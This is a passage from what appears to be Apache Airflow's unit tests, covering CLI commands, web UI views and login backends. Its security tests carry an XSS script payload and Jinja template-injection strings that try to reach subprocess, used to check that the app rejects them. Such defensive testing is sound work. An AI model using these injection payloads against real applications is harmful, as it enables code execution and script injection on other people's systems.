lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
import subprocess
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
import subprocess
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import subprocess
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_bash2 = self.dagbag.dags['test_example_bash_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_bash2 = self.dag_bash2.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run, and the text of
# the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_bash2.dag_id,
"execution_date": self.dagrun_bash2.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(self.dagrun_bash2.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=test_example_bash_operator')
self.assertIn("test_example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=run_this_last&"
"dag_id=test_example_bash_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=run_this_last&'
'dag_id=test_example_bash_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=runme_1&"
"dag_id=test_example_bash_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=test_example_bash_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("run_this_last", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
